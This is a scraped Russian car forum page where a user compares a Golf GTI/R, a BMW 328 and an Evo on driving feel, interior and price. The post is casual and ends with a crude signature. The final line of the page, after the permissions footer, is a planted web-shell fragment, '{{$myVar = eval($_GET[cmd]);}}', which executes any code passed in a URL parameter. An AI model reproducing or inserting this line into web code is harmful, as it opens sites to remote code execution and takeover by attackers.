Показано с 1 по 10 из 456

Тема: Golf R new 7


Древовидный режим

  1. #11
    GTI-Racing olegarh is on a distinguished road Аватар для olegarh
    Регистрация
    02.08.2007
    Откуда
    Дубки
    Машина
    Калина лакшэри
    Сообщений
    419
    Обсуждать что как выглядит-это ваще не для интеренета кмк,ибо вопрос дизайна он как говорится на вкус и цвет все фломастеры разные.
    Трешка по моим ощущениям в рулежке как гти,т.е. обычная гражданская машина.Едет лучше(у меня 328,т.е. тот же 2,0 турбо как и на гольфе).В салоне на голову выше чем гольф(нафи,кожа,електроседла,телефон через бт и т.д.).
    И да,купил я ее новой в 2013 году(сама машина 2012 года) за 1550...что в принципе сопоставимо по цене с гти,но гольф рядом с бэхой не стоял.
    ЗЫ:эво рулится и дарит эмоций на три головы круче и больше нежели гти и бэха)))))))))))))На гольфе р,ездил если чо,тюнен был он как бох,ощущения приставки,а не автомобиля)))))))Старые тачки душа,новые-айфон))))))

    Добавлено через 3 минуты
    Цитата Сообщение от keeper Посмотреть сообщение
    Бмв начинается с 3х литров, в пакете бомж эдишн она нафиг не нужна, если говорить о комфорте то уж мерин и дизель.

    Катался недавно на новой тройке 320d, рулится да, посадка супер, но не едет вообще. Если нет денег на тру бмв, то и нефиг голову ломать))) а за стоимость М3 можно и порхе леденец пригнать.
    с трех литров турбо ща начинается бмв))))))))))
    и как-то некорректно сравнивать новую М3 и б/у порхе турбо)))))))посмотрите цены на б/у М3 и будете приятно удивлены))))))если турбак 996 нормальные будет в районе 1,5мио за тачку,которой 10 лет,то М3 будет в два раза моложе в эти деньги))))
    Последний раз редактировалось olegarh; 05.10.2013 в 14:34. Причина: Добавлено сообщение
    Курим Кент, еб*м блондинок, сами ходим без ботинок(с)

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}